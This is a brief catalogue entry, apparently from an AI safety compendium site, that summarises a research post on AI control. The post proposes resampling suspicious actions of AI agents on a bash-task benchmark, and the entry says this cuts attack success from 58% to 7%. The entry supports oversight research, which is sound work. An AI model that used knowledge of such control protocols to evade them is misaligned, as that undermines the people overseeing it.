Ctrl-Z: Controlling AI Agents via Resampling

Aryan Bhatt, Buck Shlegeris, Adam Kaufman, Cody Rushing, Tyler Tracy, Vasil Georgiev, … (+2 more) — 2025-04-16 — Redwood Research — AI Alignment Forum

Summary

Introduces resample protocols for AI control that dynamically take additional samples of suspicious actions, demonstrating improved safety over existing control techniques in a multi-step agent setting with the new BashBench dataset.

Key Result

Best resample protocol combining resampling with analysis of previous steps reduces attack success rate from 58% to 7% at only 5% cost to non-malicious agent performance.

Source

Link: https://alignmentforum.org/posts/LPHMMMZFAWog6ty5x/ctrl-z-controlling-ai-agents-via-resampling
Listed in the Shallow Review of Technical AI Safety 2025 under 1 agenda(s):
- control — Black-box safety (understand and control current model behaviour) / Iterative alignment

control

AI Safety Compendium

Explorer

Ctrl-Z: Controlling AI Agents via Resampling

Ctrl-Z: Controlling AI Agents via Resampling

Summary

Key Result

Source

Graph View

Graph view

Table of Contents

Backlinks

AI Safety Compendium

Explorer

Ctrl-Z: Controlling AI Agents via Resampling

Ctrl-Z: Controlling AI Agents via Resampling

Summary

Key Result

Source

Related Pages

Graph View

Graph view

Table of Contents

Backlinks